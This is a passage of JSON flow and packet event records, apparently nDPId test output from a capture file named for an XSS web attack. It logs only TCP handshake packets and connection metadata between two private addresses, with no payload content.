+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347056332,"flow_last_seen":1499347061626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347056332,"flow_last_seen":1499347061626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347057628,"flow_last_seen":1499347063626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53166,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347057628,"flow_last_seen":1499347063626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53166,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347060176,"flow_last_seen":1499347065627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53192,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347060176,"flow_last_seen":1499347065627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347061452,"flow_last_seen":1499347066629,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53206,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347061452,"flow_last_seen":1499347066629,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347062740,"flow_last_seen":1499347068629,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53220,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347062740,"flow_last_seen":1499347068629,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347065288,"flow_last_seen":1499347070631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53246,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347065288,"flow_last_seen":1499347070631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347066560,"flow_last_seen":1499347071631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53260,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347066560,"flow_last_seen":1499347071631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347192547,"flow_last_seen":1499347192547,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347192547,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54580,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1499347192547,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347192547,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NKNAAD4GkS2sEAABwKgKMtU0AFBlD\/cgAAAAAKACchBokgAAAgQFtAQCCAoBOcODAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1877,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":2,"flow_last_seen":1499347192547,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347192547,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1TRgTBA1ZQ\/3IaAScSBgEgAAAgQFtAQCCAoD45T6ATnDgwEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1878,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":3,"flow_last_seen":1499347192547,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347192547,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NKRAAD4GkTSsEAABwKgKMtU0AFBlD\/chYEwQNoAQAOX\/GAAAAQEICgE5w4QD45T6"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1897,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347195099,"flow_last_seen":1499347195099,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347195099,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1897,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1499347195099,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347195099,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oYJAAD4GJE6sEAABwKgKMtVOAFAI3GeAAAAAAKACchBRzQAAAgQFtAQCCAoBOcYCAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1898,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":2,"flow_last_seen":1499347195099,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347195099,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1U4LxrqfCNxngaAScSDw6gAAAgQFtAQCCAoD45d4ATnGAgEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1899,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":3,"flow_last_seen":1499347195100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347195100,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oYNAAD4GJFWsEAABwKgKMtVOAFAI3GeBC8a6oIAQAOWP8gAAAQEICgE5xgID45d4"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1909,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347196341,"flow_last_seen":1499347196341,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347196341,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54620,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1909,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1499347196341,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347196341,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LeJAAD4Gl+6sEAABwKgKMtVcAFCW1uraAAAAAKACchA\/NAAAAgQFtAQCCAoBOcc4AAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1910,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":2,"flow_last_seen":1499347196341,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347196341,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1Vx\/2Nugltbq26AScSBICAAAAgQFtAQCCAoD45iuATnHOAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1911,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":3,"flow_last_seen":1499347196342,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347196342,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LeNAAD4Gl\/WsEAABwKgKMtVcAFCW1urbf9jboYAQAOXnDwAAAQEICgE5xzgD45iu"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1922,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347197627,"flow_last_seen":1499347197627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347197627,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54634,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1922,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1499347197627,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347197627,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jKtAAD4GOSWsEAABwKgKMtVqAFDoUUTRAAAAAKACchCScgAAAgQFtAQCCAoBOch6AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1923,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":2,"flow_last_seen":1499347197628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347197628,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1WoUz7Ep6FFE0qAScSAvhQAAAgQFtAQCCAoD45nwATnIegEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1924,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":3,"flow_last_seen":1499347197628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347197628,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jKxAAD4GOSysEAABwKgKMtVqAFDoUUTSFM+xKoAQAOXOjAAAAQEICgE5yHoD45nw"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1939,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347200170,"flow_last_seen":1499347200170,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347200170,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54660,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1939,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1499347200170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347200170,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8egdAAD4GS8msEAABwKgKMtWEAFAb8rDyAAAAAKACchDwGwAAAgQFtAQCCAoBOcr1AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1940,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":2,"flow_last_seen":1499347200171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347200171,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1YQCBmJ3G\/Kw86AScSDsLQAAAgQFtAQCCAoD45xsATnK9QEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1941,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":3,"flow_last_seen":1499347200171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347200171,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eghAAD4GS9CsEAABwKgKMtWEAFAb8rDzAgZieIAQAOWLNAAAAQEICgE5yvYD45xs"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1951,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347201471,"flow_last_seen":1499347201471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201471,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54674,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1951,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1499347201471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347201471,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JERAAD4GoYysEAABwKgKMtWSAFCOe+h\/AAAAAKACchBEsQAAAgQFtAQCCAoBOcw7AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1952,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":2,"flow_last_seen":1499347201471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347201471,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1ZJxUzmIjnvogKAScSD5HwAAAgQFtAQCCAoD452xATnMOwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1953,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":3,"flow_last_seen":1499347201472,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347201472,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JEVAAD4GoZOsEAABwKgKMtWSAFCOe+iAcVM5iYAQAOWYJwAAAQEICgE5zDsD452x"} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347069146,"flow_last_seen":1499347074630,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53286,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347069146,"flow_last_seen":1499347074630,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53286,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347070422,"flow_last_seen":1499347075631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53300,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347070422,"flow_last_seen":1499347075631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347071685,"flow_last_seen":1499347077632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53314,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347071685,"flow_last_seen":1499347077632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347074268,"flow_last_seen":1499347079633,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53340,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347074268,"flow_last_seen":1499347079633,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 